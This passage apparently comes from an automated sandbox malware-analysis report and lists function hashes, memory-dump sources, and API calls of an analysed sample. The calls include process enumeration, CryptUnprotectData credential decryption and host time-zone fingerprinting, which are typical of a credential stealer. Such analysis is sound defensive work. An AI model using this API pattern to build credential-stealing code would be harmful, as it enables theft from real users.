                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 9673f8a5148ccc2f4d4ac0af72a19799a7efa73da6b3aff6fac6b042281163f1
                                    • Instruction ID: fba70ab7fed884945f939b2f77c753361467b955d1e02480800f6cbb525c4e7b
                                    • Opcode Fuzzy Hash: 9673f8a5148ccc2f4d4ac0af72a19799a7efa73da6b3aff6fac6b042281163f1
                                    • Instruction Fuzzy Hash: 81011EB5A14208EBDB31DFA4CD44BDEB7F9BB08700F108689E50997240DB349B40CF91
                                    Function 00384573 Relevance: 7.3, Strings: 2, Instructions: 4819COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <7\h$huzx
                                    • API String ID: 0-2989614873
                                    • Opcode ID: 7eb3bdc0e0c5d631cfbe53155e1ab1a1baa4b8cd2ca62bdfc37e045bbc204dbd
                                    • Instruction ID: 355decbe2e18364a168f3a1404da1590ec1baf5d09506661d7190114dd2b4acb
                                    • Opcode Fuzzy Hash: 7eb3bdc0e0c5d631cfbe53155e1ab1a1baa4b8cd2ca62bdfc37e045bbc204dbd
                                    • Instruction Fuzzy Hash: CB63667242EBD51ECB27EF3047B61917F66BA1321031D49CEC8C18F9B3C6949A1AE356
                                    Function 007B30FA Relevance: 6.6, Strings: 4, Instructions: 1632COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 12Me$Bj}_$Bj}_$fnJ/
                                    • API String ID: 0-3405775522
                                    • Opcode ID: 6aab4c979fa42a94d15d074b855a029c2dc7ec0da00a837b4082132d01cd7320
                                    • Instruction ID: 43d37370351420a59e5a66bd3486f0e8e1718eb5da112e96bd9482bdc2fb4c6a
                                    • Opcode Fuzzy Hash: 6aab4c979fa42a94d15d074b855a029c2dc7ec0da00a837b4082132d01cd7320
                                    • Instruction Fuzzy Hash: 62B2F7F360C2009FE314AE2DEC8567AFBE9EF94720F16492DEAC4C3744E63598458697
                                    Function 007B83D8 Relevance: 6.6, Strings: 4, Instructions: 1610COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: .&-w$/$?$U;zr$Hwo
                                    • API String ID: 0-2796635779
                                    • Opcode ID: fef4ef79e2ba5dca662b589ae2bfdbcfe36f32981b87b79880b6f8ed66eb8b6d
                                    • Instruction ID: a9907df944c73ae354dcc09f455062922b3dfa26d679c44d14ddb743fd11d8f9
                                    • Opcode Fuzzy Hash: fef4ef79e2ba5dca662b589ae2bfdbcfe36f32981b87b79880b6f8ed66eb8b6d
                                    • Instruction Fuzzy Hash: B2B219F3A0C2109FE304AE2DEC8567AFBE5EF94320F16853DEAC487744EA3558058697
                                    Function 007BF37A Relevance: 6.3, Strings: 4, Instructions: 1252COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 'x~<$,?7o$GCt$h0=
                                    • API String ID: 0-3544228397
                                    • Opcode ID: e2764373d1f6c1766a945e83e457c83168ae60ae2bf41addee26e308dfe130e8
                                    • Instruction ID: bc46337c6850e3b1e74f08649de0c9943b2d837dc782e0d0ac8d8a01c3bd78a1
                                    • Opcode Fuzzy Hash: e2764373d1f6c1766a945e83e457c83168ae60ae2bf41addee26e308dfe130e8
                                    • Instruction Fuzzy Hash: C18219F3A0C2049FE7046E29EC8567AFBE9EF94320F1A493DE6C4C7744EA3558418697
                                    Function 00379030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,003651D4,40000001,00000000,00000000,?,003651D4), ref: 00379050
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    • Opcode ID: 00996610ba0b913aa0d6518d8c6365da4990fa1df793294ece7c352444920805
                                    • Instruction ID: 1b4ae4c90372c42900bfe97cf370f7cc0d8c77df82274a848d7958958ae263de
                                    • Opcode Fuzzy Hash: 00996610ba0b913aa0d6518d8c6365da4990fa1df793294ece7c352444920805
                                    • Instruction Fuzzy Hash: 4C11F5B0214209EFDB25CF54DC84FAB33A9AF89314F10D649FA198B250D779E9419BA0
                                    Function 00377B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00380DE8,00000000,?), ref: 00377B40
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00377B47
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,00380DE8,00000000,?), ref: 00377B54
                                    • wsprintfA.USER32 ref: 00377B83
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: 2e29cd0975765db338a23044b9e27eef54c0f6bfd1a30e1bc075efade2b7021e
                                    • Instruction ID: c5920e8ac192699d116683fe706ae8df675acfb0fdbfc4f7a365a9963348e1f9
                                    • Opcode Fuzzy Hash: 2e29cd0975765db338a23044b9e27eef54c0f6bfd1a30e1bc075efade2b7021e
                                    • Instruction Fuzzy Hash: 54112AF2908119ABCB24DBC9DD45BBFB7F9EB4CB11F10411AF605A2280D3795940C7B0
                                    Function 00377BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00F3D9E0,00000000,?,00380DF8,00000000,?,00000000,00000000), ref: 00377BF3
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00377BFA
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00F3D9E0,00000000,?,00380DF8,00000000,?,00000000,00000000,?), ref: 00377C0D
                                    • wsprintfA.USER32 ref: 00377C47
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    • Opcode ID: bb485feaa3788b25f5042909c3a096cb6431fba05d2d512f24db4d89ccc87800
                                    • Instruction ID: a1dcf638147c4b564546efb79e523b14ae552937505e312975e1309798567400
                                    • Opcode Fuzzy Hash: bb485feaa3788b25f5042909c3a096cb6431fba05d2d512f24db4d89ccc87800
                                    • Instruction Fuzzy Hash: 7A11E1B0909219EBEB218B54DC45FAAB7B8FB04721F0043D9F619A32D0C7781A40CF90
                                    Function 00373970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoCreateInstance.COMBASE(0037E120,00000000,00000001,0037E110,00000000), ref: 003739A8
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00373A00
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWide
                                    • String ID:
                                    • API String ID: 123533781-0
                                    • Opcode ID: e566ff25a712e51c5a0a5ddd701ef729154e265361eb7dbdce0d9a7fc6578968
                                    • Instruction ID: 3e9806d6c026b8289fa1a23eead0f6be5108e4f6e999ed846aa12af4b4f07524
                                    • Opcode Fuzzy Hash: e566ff25a712e51c5a0a5ddd701ef729154e265361eb7dbdce0d9a7fc6578968
                                    • Instruction Fuzzy Hash: F841F971A40A289FDB24DB54CC95F9BB7B5BB48702F4081C8E608EB2D0D7B16E85CF50
                                    Function 0036A2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0036A2D4
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 0036A2F3
                                    • LocalFree.KERNEL32(?), ref: 0036A323
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$AllocCryptDataFreeUnprotect
                                    • String ID:
                                    • API String ID: 2068576380-0
                                    • Opcode ID: 829298063b9c60c8512a9611954db285c7e4407f175c1fba1a45bd72a76c54b2
                                    • Instruction ID: 6720cd5832acadd30fa77b9f3c4897505dc6b78154f0458a8ea3db115ed1bcd5
                                    • Opcode Fuzzy Hash: 829298063b9c60c8512a9611954db285c7e4407f175c1fba1a45bd72a76c54b2
                                    • Instruction Fuzzy Hash: 7311F7B8A00209EFCB04DFA4D884AAEB7B5FF89300F108559ED15A7350D730AE50CFA1
                                    Function 007B9DF4 Relevance: 4.2, Strings: 2, Instructions: 1656COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 2m$oc]
                                    • API String ID: 0-15840130
                                    • Opcode ID: e05d8ea3743531025df2aa1dea2f916eb88829b981cdbfba35d345d30f62dc66
                                    • Instruction ID: 1a6b218ba8c83ab519a7ef30244dae90dd6ee9843c2b135156fc694675e647a1
                                    • Opcode Fuzzy Hash: e05d8ea3743531025df2aa1dea2f916eb88829b981cdbfba35d345d30f62dc66
                                    • Instruction Fuzzy Hash: 24B2F7F3A0C2049FE3046E2DEC8567AFBE9EF94720F1A453DEAC487744EA3558058697
                                    Function 007BBA17 Relevance: 4.1, Strings: 2, Instructions: 1601COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
